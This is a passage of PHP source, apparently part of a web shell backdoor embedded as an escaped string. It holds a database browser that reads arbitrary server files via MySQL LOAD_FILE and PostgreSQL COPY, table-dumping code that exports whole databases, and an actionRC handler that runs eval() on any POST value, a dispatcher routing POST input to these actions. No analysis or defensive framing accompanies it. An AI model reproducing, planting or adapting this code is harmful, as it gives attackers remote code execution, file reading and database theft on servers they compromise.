switch($this->type){
case \'mysql\':
return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));
break;
case \'pgsql\':
$this->query("CREATE TABLE X2(file text);COPY X2 FROM \'".addslashes($str)."\';select file from X2;");
$r=array();
while($i=$this->fetch())
$r[]=$i[\'file\'];
$this->query(\'drop table X2\');
return array(\'file\'=>implode("
",$r));
break;
}
return false;
}
function dump($table,$fp=false){
switch($this->type){
case \'mysql\':
$res=$this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');
$create=mysql_fetch_array($res);
$sql=$create[1].";
";
if($fp) fwrite($fp,$sql); else echo($sql);
$this->query(\'SELECT * FROM `\'.$table.\'`\');
$head=true;
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
if($v==null)
$item[$k]="NULL";
elseif(is_numeric($v))
$item[$k]=$v;
else
$item[$k]="\'".@mysql_real_escape_string($v)."\'";
$columns[]="`".$k."`";
}
if($head){
$sql=\'INSERT INTO `\'.$table.\'` (\'.implode(",",$columns).") VALUES
(".implode(",",$item).\')\';
$head=false;
}else
$sql="
,(".implode(",",$item).\')\';
if($fp) fwrite($fp,$sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp,";
"); else echo(";
");
break;
case \'pgsql\':
$this->query(\'SELECT * FROM \'.$table);
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
$item[$k]="\'".addslashes($v)."\'";
$columns[]=$k;
}
$sql=\'INSERT INTO \'.$table.\' (\'.implode(",",$columns).\') VALUES (\'.implode(",",$item).\');\'."
";
if($fp) fwrite($fp,$sql); else echo($sql);
}
break;
}
return false;
}
};
$db=new DbClass($_POST[\'type\']);
if(@$_POST[\'p2\']==\'download\'){
$db->connect($_POST[\'sql_host\'],$_POST[\'sql_login\'],$_POST[\'sql_pass\'],$_POST[\'sql_base\']);
$db->selectdb($_POST[\'sql_base\']);
switch($_POST[\'charset\']){
case "Windows-1251": $db->setCharset(\'cp1251\'); break;
case "UTF-8": $db->setCharset(\'utf8\'); break;
case "KOI8-R": $db->setCharset(\'koi8r\'); break;
case "KOI8-U": $db->setCharset(\'koi8u\'); break;
case "cp866": $db->setCharset(\'cp866\'); break;
}
if(empty($_POST[\'file\'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST[\'tbl\'] as $v)
$db->dump($v);
exit;
}elseif($fp=@fopen($_POST[\'file\'],\'w\')){
foreach($_POST[\'tbl\'] as $v)
$db->dump($v,$fp);
fclose($fp);
unset($_POST[\'p2\']);
}else
die(\'\');
}
XHeader();
echo "
Sql browser
";
if(isset($db)&&$db->link){
echo " ";
if($_POST[\'type\']==\'mysql\'){
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`,\'@\',`host`)=USER() AND `File_priv`=\'y\'");
if($db->fetch())
echo "
Load file >\'>";
}
if(@$_POST[\'p1\']==\'loadfile\'){
$file=$db->loadFile($_POST[\'p2\']);
echo \'
\'.htmlspecialchars($file[\'file\']).\' \';
}
}else {
echo htmlspecialchars($db->error());
}
echo \'
\';
XFooter();
}
function actionRC(){
if(!@$_POST[\'p1\']){
$a=array(
"uname"=>php_uname(),
"php_version"=>phpversion(),
"X_version"=>X_VERSION,
"safemode"=>@ini_get(\'safe_mode\')
);
echo serialize($a);
}else {
eval($_POST[\'p1\']);
}
}
if(empty($_POST[\'a\']))if(isset($default_action)&&function_exists(\'action\'.$default_action))$_POST[\'a\']=$default_action;else$_POST[\'a\']=\'SecInfo\';if(!empty($_POST[\'a\'])&&function_exists(\'action\'.$_POST[\'a\']))call_user_func(\'action\'.$_POST[\'a\']);exit;'//